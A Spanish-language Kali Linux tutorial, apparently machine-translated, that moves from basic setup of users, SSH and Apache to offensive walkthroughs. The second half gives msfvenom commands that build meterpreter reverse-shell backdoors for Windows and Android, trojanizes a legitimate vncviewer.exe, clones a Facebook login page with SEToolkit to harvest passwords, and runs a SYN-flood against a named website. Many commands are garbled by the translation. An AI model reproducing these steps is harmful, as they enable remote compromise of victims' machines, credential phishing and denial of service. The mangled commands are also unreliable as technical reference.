Por qué deberías usar Kali Linux?
Kali Linux es utilizado principalmente por probadores de penetración, auditores de seguridad, investigadores e investigadores forenses. Tiene casi todas las herramientas o script preinstaladas que se pueden usar para cualquiera de los propósitos anteriores. Puede usar Kali Linux para descifrar las redes WiFi, ejecutar Open Source Intelligence (OSINT) en alguien, para piratear sitios web y redes y muchos más.
Además de la piratería ética, Kali Linux también tiene un conjunto de herramientas para la investigación forense. Forensics es otra rama importante y emergente de seguridad cuyo objetivo principal es recopilar y analizar las evidencias de una actividad criminal y luego retroceder a los ciberdelincuentes. La investigación forense ayuda a rastrear y eliminar los efectos maliciosos (puertas traseras, malwares) resultó de una actividad criminal y calculando/manejando la pérdida después de un ataque cibernético. Kali Linux tiene un modo de vida sigiloso separado para operaciones de "forense" en las que no deja ninguna huella digital en el sistema de host.
Ponerse cómodo con el entorno de Kali
Kali no está hecho para usuarios comunes y no es muy fácil de usar como Windows o Ubuntu. Su entorno predeterminado es raíz, que no es muy fácil de usar y es bastante peligroso para los novatos. También carece de utilidades básicas como Snap, VirtualBox y otras utilidades útiles que están presentes en Ubuntu.
Primero lo primero
Lo primero que debe hacer es hacer un usuario no raíz
root@kali: ~# adduser kali
Agregar usuarios 'Kali' ..
Agregar nuevo grupo 'Kali' (1002) ..
Agregar nuevo usuario 'Kali' (1002) con el grupo 'Kali' ..
Creación del directorio de inicio '/Home/Kali' ..
Copiar archivos de '/etc/skel' ..
Nueva contraseña:
... Snip ..
root@kali: ~# usermod -ag sudo kali
Inicializar la base de datos PostgreSQL de MetaSploit Framework
root@kali: ~# msfdb init
Creación del usuario de la base de datos 'MSF'
Ingrese la contraseña para un nuevo rol:
Ingrese de nuevo:
Creación de bases de datos 'MSF' y 'MSF_TEST'
... Snip ..
Agregue las siguientes líneas a su “/etc/apt/fuentes.Lista de lista "Archivo
Deb http: // http.kali.org/kali kali-rolling principal contribución no libre
# Para el acceso al paquete de origen, sin comment la siguiente línea
# deb-src http: // http.kali.org/kali kali-rolling principal contribución no libre
Instalar algunas otras herramientas útiles.
root@kali: ~# apt -get update && apt ograde -y
root@kali: ~# apt-get instalar virtualbox virtualbox-dkms gobuster tor tor-browser
OpenVPN HTOP Atom Deepin -terminal Tilix -Y
Administración de los servicios predeterminados de Kali
Kali viene con muchos servicios no estándar preinstalados como PostgreSQL, MySQL, SSH, HTTP. Si no está configurado correctamente, estos servicios comenzarán como un proceso de fondo cuando su Kali Linux se inicie y estos puertos abiertos pueden ser una amenaza para la seguridad de su sistema.
En esta sección, veremos cómo funcionan estos servicios y cómo puede configurarlos correctamente y cómo puede usarlos. La forma estándar de configurar una herramienta o un servicio es leer su archivo DOC ReadMe. El archivo ReadMe contiene el procedimiento estándar para configurar y usar una herramienta o un servicio. Los archivos ReadMe generalmente se encuentran en la carpeta “/usr/share/doc/[tool_name]/readMe”.
Servicio seguro de shell (SSH)
Secure Shell (SSH) se ha utilizado durante mucho tiempo como una herramienta estándar para ejecutar remotamente comandos, transferir archivos y otros propósitos de administración remota. El paquete incluye SSH (cliente) y SSHD (servicio) para controlar otras máquinas de forma remota.
El servicio SSH no se inicia de forma predeterminada cuando Kali se inicia, puede iniciarlo escribiendo,
root@kali: ~ $ servicio ssh inicio
root@kali: ~ $ netstat -antp | grep -i sshd
TCP 0 0 0.0.0.0:22 0.0.0.0:* Escucha 6601/sshd
TCP6 0 0 ::: 22 ::::* Escucha 6601/sshd
Si quieres sshd para comenzar cada vez que tus kali se ponen en marcha. Tipo
root@kali: ~ $ update-rc.d ssh habilitar
Si desea que alguien inicie sesión en su PC a través de SSH, utilizará el nombre de usuario y la contraseña de su Kali para la autenticación de inicio de sesión. Así que mejor cambie su contraseña predeterminada "toor" a algo seguro.
root@kali: ~ $ passwd
Cambiar contraseña para root.
Contraseña actual:
Nueva contraseña:
Reescriba nueva contraseña:
PASSWD: Contraseña actualizada correctamente
Ahora, recargar el servicio SSH para afectar los cambios
root@kali: ~ $ servicio ssh recoad
Servicio HTTP
El servicio HTTP es muy beneficioso mientras realiza tareas de piratería ética relacionadas con la piratería ética. Se puede usar para alojar páginas web y sitio web de phishing falsos, para transferir archivos a servidores de víctimas remotas. Con las aplicaciones web se vuelven más populares todos los días, ahora es más importante tener conocimiento para comprender y operar servidores HTTP como Apache.
Apache es un servidor HTTP que viene preinstalado en Kali. El servicio HTTP de Apache está deshabilitado de forma predeterminada, pero puede iniciarlo usando el siguiente comando.
root@kali: ~ $ servicio apache2 iniciar
Apache alojará su página web de Debian predeterminada en su dominio local en el puerto HTTP estándar 80. Vaya a http: // localhost: 80/
Para comenzar cada vez que cuando comience su kali, escriba
root@kali: ~ $ update-rc.d apache2 habilitar
También puede configurar Apache en un puerto no estándar modificando su archivo de configuración (/etc/apache2/puertos.conf)
root@kali: ~ $ nano/etc/apache2/puertos.confusión
Guarde el archivo y luego ejecute
root@kali: ~ $ servicio apache2 reiniciar
Ahora, Apache se servirá en el puerto "1234" en lugar del puerto estándar 80.
Si desea leer la documentación completa del servidor Apache, vaya al Directorio “/usr/share/doc/apache2/”, escriba
root@kali: ~ $ cd/usr/share/doc/apache2/
root@kali:/usr/share/doc/apache2 $ gzip --decompress readMe.Debian.GZ
root@kali:/usr/share/doc/apache2 $ nano readme.Debian
Una lista de algunos comandos útiles
localizar se usa para ubicar un archivo en Linux, antes de usar este comando, debe actualizar su base de datos primero
root@kali: ~# actualatedb
root@kali: ~# localizar uqjhssvf.jpeg
/root/uqjhssvf.jpeg
encontrar es más agresivo y no confía en la base de datos. Busca recursivamente el archivo en el directorio dado y sus subdirectorios.
root@kali: ~# encontrar ./ -name principal.py
./Escritorio/principal.py
wget se puede usar para descargar una página web o archivo en la terminal.
root@kali: ~# wget tinytuba.comunicarse
--2019-05-11 08: 58: 48-- http: // tinytuba.com/
Resolver tinytuba.com (tinytuba.com) ... 52.216.129.66
Conectándose a tinytuba.com (tinytuba.com) | 52.216.129.66 |: 80 ... conectado.
Solicitud HTTP enviada, en espera de respuesta ... 200 OK
Longitud: 1551 (1.5k) [texto/html]
Guardar a: 'Índice.html '
índice.html 100%[==========================>] 1.51k --.-KB/s en 0s
2019-05-11 08:58:50 (56.5 MB/s) - 'Índice.html 'guardado [1551/1551]
root@kali: ~# firefox índice.html
arriba le brinda información sobre su CPU, uso de la memoria y otras estadísticas.
historia Muestre la lista de comandos anteriores que ha ingresado en su terminal.
Algunos otros comandos útiles que puede encontrar en Internet son LS, RM, RMDIR, Adduser, Deluser, Service, Nano, Cat, More, Less, Uname, Whoami etc
Generar puertas traseras maliciosas
Puede generar binarios exe maliciosos utilizando "msfvenom" Kali Linux e instalarlos en el sistema de otra persona para controlarlo de forma remota.
root@kali: ~ $ msfvenom -a x86 --platform windows -b '\ x00' -p windows/meterpreter/reverse_tcp
Lhost = [dirección IP del atacante] lport = [Puerto de atacante no] -f exe> diversión.exe
Encontrados 11 codificadores compatibles
Intentando codificar la carga útil con 1 iteraciones de x86/shikata_ga_nai
x86/shikata_ga_nai tuvo éxito con el tamaño 368 (iteración = 0)
x86/shikata_ga_nai elegido con el tamaño final 368
Tamaño de carga útil: 368 bytes
Tamaño final del archivo exe: 73802 bytes
root@kali: ~ $ ls diversión.exe
divertido.exe
root@kali: ~ $ archivo diversión.exe
divertido.EXE: Ejecutable PE32 (GUI) Intel 80386, para MS Windows
Para generar puerta trasera para sistemas de Windows de arquitectura X64, escriba el siguiente comando.
root@kali: ~ $ msfvenom --platform windows -b '\ x00' -p windows/x64/meterpreter/reverse_tcp
Lhost = [dirección IP del atacante] lport = [Puerto de atacante no] -f exe> diversión.exe
[-] Sin arco seleccionado, seleccionando Arch: x64 de la carga útil
Encontrados 3 codificadores compatibles
... Snip ..
root@kali: ~ $ archivo diversión.exe
divertido.EXE: PE32+ Ejecutable (GUI) X86-64, para MS Windows
Incrustar las puertas traseras en aplicaciones legítimas utilizando Kali
También puede incrustar su código de puerta trasera maliciosa en un archivo exe inofensivo como el instalador de lector de Adobe o algún ejecutable de reproductor multimedia. El ejecutable trasero resultante se verá como una aplicación de software legítima, pero cuando se ejecute en la computadora de la víctima, ejecutará su puerta trasera maliciosa junto con esa aplicación legítima, lo que resulta en la compromiso de la PC de la víctima.
Hay algunos ejecutables de Windows ya presentes en Kali Linux, que usaremos para demostración.
root@kali: ~ $ ls/usr/share/windows-binaries/
puertas traseras/ exe2bat.exe fport/ klogger.exe nbtenum/ plink.exe vncviewer.exe whoami.exe
enumplus/ fgdump/ hyperion/ mbenum/ nc.exe radmin.exe wget.exe
Inyectaremos nuestra carga útil en "vncviewer.Ejecutable EXE ".
root@kali: ~ $ msfvenom -a x86 --platform windows -x/usr/share/windows -binaries/vncviewer.exe
-k -p windows/meterpreter/reverse_tcp lhost = [IP] Lort = [Puerto del atacante]
-E x86/shikata_ga_nai -i 3 -b "\ x00" -f exe -o vncviewer.exe
Encontrado 1 codificadores compatibles
Intentando codificar la carga útil con 3 iteraciones de x86/shikata_ga_nai
... Snip ..
Tamaño de carga útil: 422 bytes
Tamaño final del archivo EXE: 421376 bytes
Guardado como: vncviewer.exe
Generar puertas traseras de Android
Para controlar los teléfonos Android de forma remota, puede generar archivos APK maliciosos utilizando MSFVENOM.
root@kali: ~ $ msfvenom -p android/meterpreter/reverse_tcp lhost = [IP del atacante]
Lport = [Puerto del atacante no] r> lo que sea.apk
[-] No se seleccionó ninguna plataforma, eligiendo msf :: módulo :: plataforma :: android desde la carga útil
[-] Sin arco seleccionado, seleccionando Arch: Dalvik de la carga útil
No hay codificador o badchars especificado, produciendo carga útil sin procesar
Tamaño de carga útil: 10087 bytes
Ingeniería social utilizando SETOOLKIT
La ingeniería social es el uso del engaño para engañar a alguien para que revele su información confidencial o personal que puede ser mal utilizada para fines maliciosos.
La técnica de ingeniería social más utilizada es el phishing, en la que intenta enviar mensajes, correos electrónicos o llamadas telefónicas para obtener información personal relacionada con el dinero. En Phishing Attack, el receptor de un correo electrónico está persuadido de que ha recibido el correo electrónico de una fuente genuina como un banco o un departamento gubernamental, y luego ha engañado para revelar sus credenciales sensibles.
En esta demostración, clonaremos una página de inicio de sesión de Facebook usando SETOOLKIT y hostigamos esa página en nuestro servidor HTTP, luego enviaremos la dirección IP de nuestro servidor HTTP a la víctima. Cuando la víctima inicia sesión en nuestra página falsa de inicio de sesión de Facebook, esta página enviará su nombre de usuario y contraseña a nuestra máquina Kali.
Tipo setoolkit En la terminal, se abrirá setoolkit
Cuando la víctima ingrese nuestra dirección IP en su navegador, se le presentará nuestra página de inicio de sesión de Facebook falsa que hemos creado anteriormente. Tenemos que esperar hasta que la víctima ingrese a su nombre de usuario y contraseña en nuestra página clonada. La página falsa de Facebook se verá así,
Mientras el usuario ingrese sus credenciales, Setoolkit las mostrará en la terminal.
Esta demostración estaba en la red local, si desea hacer esto en la IP pública, entonces debe hacer el reenvío de puertos en su enrutador o puede usar NGROK para IP público y número de puerto.
Ataque de denegación de servicio (DOS) utilizando MetaSploit
El ataque de denegación de servicio (DOS) es un tipo de ataque a un sistema o red que disminuye o restringe la accesibilidad de los recursos del sistema a sus usuarios legítimos. El propósito de un ataque de DOS no es robar información confidencial, sino que el atacante intenta inundar el sistema de víctimas con solicitudes de servicio no legítimas para sobrecargar sus recursos.
Un ataque distribuido de denegación de servicio (DDoS) necesita una gran cantidad de sistemas (referidos como zombis) atacando un solo objetivo, lo que resulta en la negación del servicio. Un solo ataque de DOS no puede afectar los grandes servidores y redes empresariales, es por eso que DDOS es más efectivo y letal. También es difícil rastrear y bloquear el ataque DDoS porque cientos y miles de sistemas zombies atacan a un solo anfitrión.
Son muchas herramientas y scripts disponibles para ataques DOS y DDoS, pero utilizaremos un módulo auxiliar de MetaSploit para la demostración. Intentaremos eliminar un sitio web de muestra "www.jarusa.com ".
Primero, vaya a https: // www.isitdownrightnow.com/ y confirmar que el sitio web está en funcionamiento
El sitio web está arriba. Ahora, abra la consola de marco de metasploit en su terminal.
root@kali: ~ $ msfconsole
... Snip ..
MSF5> Use auxiliar/dos/tcp/synflood
Descubrir www.jarusa.comunicarseDirección IP de 'y establecerla como Rhost y luego ejecutar el ataque
Después de un tiempo, verá que el sitio web no está disponible. Confirmarlo usando https: // www.isitdownrightnow.com/
Kali Linux es un hogar para hackers éticos y este tutorial te ha iluminado con los conceptos básicos de Kali Linux, qué puede hacer y cómo comenzar con su uso.